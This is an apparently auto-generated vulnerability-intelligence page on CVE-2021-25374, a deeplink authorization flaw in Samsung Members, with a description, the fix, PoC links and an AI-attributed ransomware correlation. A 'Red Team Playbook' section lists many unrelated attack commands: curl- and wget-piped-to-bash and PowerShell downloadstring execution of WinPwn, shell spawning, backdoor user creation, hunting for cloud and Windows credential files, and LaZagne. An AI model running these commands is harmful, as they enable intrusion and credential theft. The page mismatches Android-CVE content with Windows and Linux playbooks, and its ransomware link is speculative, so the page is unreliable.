CVE-2021-25374
Overview
This vulnerability is an improper authorization flaw within the Samsung Members application, specifically affecting the "samsungrewards" deeplink scheme. The root cause lies in insufficient access control validation for deeplink requests, allowing unauthorized entities to invoke functionality intended for authenticated users. The affected component is the deeplink handler in Samsung Members versions 2.4.83.9 on Android 8.1 and below, and 3.9.00.9 on Android 9.0 and above.
Vulnerability Description
An improper authorization vulnerability in Samsung Members "samsungrewards" scheme for deeplink in versions 2.4.83.9 in Android O(8.1) and below, and 3.9.00.9 in Android P(9.0) and above allows remote attackers to access a user data related with Samsung Account.
Impact
An unauthenticated remote attacker can exploit this vulnerability to retrieve sensitive user data linked to Samsung Accounts by sending specially crafted deeplink requests. No user interaction or prior authentication is required, as indicated by the CVSS vector (AV:N/AC:L/PR:N/UI:N). This can lead to unauthorized disclosure of personal information, potentially resulting in privacy violations and targeted attacks against affected users.
Solution
Samsung recommends updating the Samsung Members app to versions later than 2.4.83.9 for Android O and below, and 3.9.00.9 for Android P and above, as detailed in their official security advisory available at https://security.samsungmobile.com/ and https://security.samsungmobile.com/serviceWeb.smsb. Users and administrators should apply these updates promptly to remediate the improper authorization issue in the "samsungrewards" deeplink scheme.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Correlated Groups
Correlations are established through analysis of shared tools, tactics, and infrastructure between threat groups and vulnerabilities. They do not represent direct confirmation of exploitation.
| Group | Confidence | Victims | Source |
|---|---|---|---|
|
underground
|
MEDIUM | 26 | correlation_ai |
Full Analysis
The vulnerability in the Samsung Members application stems from improper authorization mechanisms within the "samsungrewards" scheme. This flaw allows attackers to exploit deeplinks to gain unauthorized access to sensitive user data associated with Samsung Accounts. The affected versions of the application, specifically 2.4.83.9 for Android O (8.1) and 3.9.00.9 for Android P (9.0) and above, lack sufficient checks to verify whether a user is authorized to access certain resources. As a result, an attacker can craft a malicious link that, when clicked by a user, can redirect them to a page that improperly exposes their account information, including personal data and potentially sensitive credentials.
Attack vectors for this vulnerability primarily involve social engineering and phishing techniques. An attacker could send a crafted link via email, SMS, or social media, enticing users to click on it under false pretenses. Once the user interacts with the link, the application may inadvertently expose their account details without requiring proper authentication. Additionally, attackers could leverage this vulnerability in conjunction with other tactics, such as man-in-the-middle attacks, to intercept traffic and further exploit the exposed data. The ease of exploitation, combined with the widespread use of the Samsung Members application, significantly increases the risk of successful attacks.
The real-world impact of this vulnerability is substantial, particularly for users who may have sensitive information linked to their Samsung Accounts. The exposure of personal data can lead to identity theft, financial fraud, and unauthorized access to other linked services. For businesses, the repercussions can be severe, including reputational damage, loss of customer trust, and potential legal liabilities stemming from data breaches. The financial implications can also be significant, with costs associated with incident response, regulatory fines, and the implementation of remedial measures to secure affected systems.
To detect and mitigate this vulnerability, organizations should implement several strategies. First, a thorough audit of the Samsung Members application and its authorization mechanisms is essential. This includes reviewing the deeplink handling processes to ensure that proper authentication checks are enforced. Regular security assessments and penetration testing can help identify similar vulnerabilities before they are exploited. Furthermore, educating users about the risks of clicking on unknown links and promoting best practices for account security, such as enabling two-factor authentication, can significantly reduce the likelihood of successful exploitation.
In conclusion, the improper authorization vulnerability within the Samsung Members application represents a critical risk to both users and businesses. Given the potential for unauthorized access to sensitive data, it is imperative that organizations take proactive steps to secure their applications and educate users on safe practices. By addressing the underlying technical issues and enhancing user awareness, the overall risk associated with this vulnerability can be effectively mitigated.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Samsung | Members | All |
cpe:2.3:a:samsung:members:*:*:*:*:*:*:*:*
|
|
|
Samsung | Members | All |
cpe:2.3:a:samsung:members:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
ReversecLabs/CVE-2021-25374_Samsung-Account-Access
This script can be used to gain access to a victim's Samsung Account if they have a specific version of Samsung Members ...
|
ReversecLabs | 31 | 19 | 2021-04-10 | View |
|
PoC
|
- | 0 | 0 | - | View |
Ransomware Groups 1
Threat Feed
2 eventsRansomware group known to exploit this vulnerability (26 known victims)
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-25374 |
| security.samsungmobile.com |
GitHub CVE
x_refsource_CONFIRM
|
https://security.samsungmobile.com/ |
| security.samsungmobile.com |
GitHub CVE
x_refsource_CONFIRM
|
https://security.samsungmobile.com/serviceWeb.smsb |